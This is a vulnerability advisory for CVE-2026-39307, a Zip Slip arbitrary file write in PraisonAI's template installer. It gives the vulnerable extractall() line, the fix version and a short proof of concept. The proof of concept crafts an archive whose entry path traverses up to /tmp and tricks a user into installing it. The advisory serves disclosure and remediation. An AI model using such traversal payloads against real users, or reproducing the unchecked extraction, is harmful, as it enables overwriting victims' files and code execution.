CVE-2026-39307
PraisonAI Has Arbitrary File Write (Zip Slip) in Templates Extraction
Description
The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. ### Details Location: `src/praisonai/praisonai/cli/features/templates.py` (Line 852) Vulnerable Code snippet: ```python zip_ref.extractall(tmpdir) ``` During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem. ### PoC 1. Generate a malicious zip payload: ```python import zipfile with zipfile.ZipFile('malicious_template.zip', 'w') as z: # Adding a file that traverses directories z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip') ``` 2. Trick a user into installing the malicious template: ```bash praisonai templates install github:attacker/malicious_template ``` 3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine. ### Impact This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
How to fix CVE-2026-39307
To remediate CVE-2026-39307, upgrade the affected package to a fixed version below.
- —upgrade to 4.5.113 or later
Is CVE-2026-39307 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.